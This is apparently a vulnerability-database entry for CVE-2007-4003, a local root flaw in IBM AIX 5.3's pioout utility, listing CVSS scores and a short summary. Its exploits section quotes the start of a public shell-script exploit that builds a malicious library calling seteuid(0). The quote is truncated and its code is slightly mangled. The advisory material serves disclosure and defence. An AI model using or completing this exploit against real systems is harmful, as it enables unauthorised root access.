6.9
CVSSv2

CVE-2007-4003

Published: 26/07/2007 Updated: 29/07/2017
CVSS v2 Base Score: 6.9 | Impact Score: 10 | Exploitability Score: 3.4
VMScore: 695
Vector: AV:L/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

pioout in IBM AIX 5.3 SP6 allows local users to execute arbitrary code by specifying a malicious library with the -R (ParseRoutine) command line argument.

Vulnerable Product Search on Vulmon Subscribe to Product

ibm aix 5.3

Exploits

#!/bin/sh # # 07/2007: public release # IBM AIX <= 53 sp6 # echo "-------------------------------" echo " AIX pioout Local Root Exploit " echo " By qaaz" echo "-------------------------------" cat >piolibc <<_EOF_ #include <stdlibh> #include <unistdh> void init() __attribute__ ((constructor)); void init() { seteuid(0); ...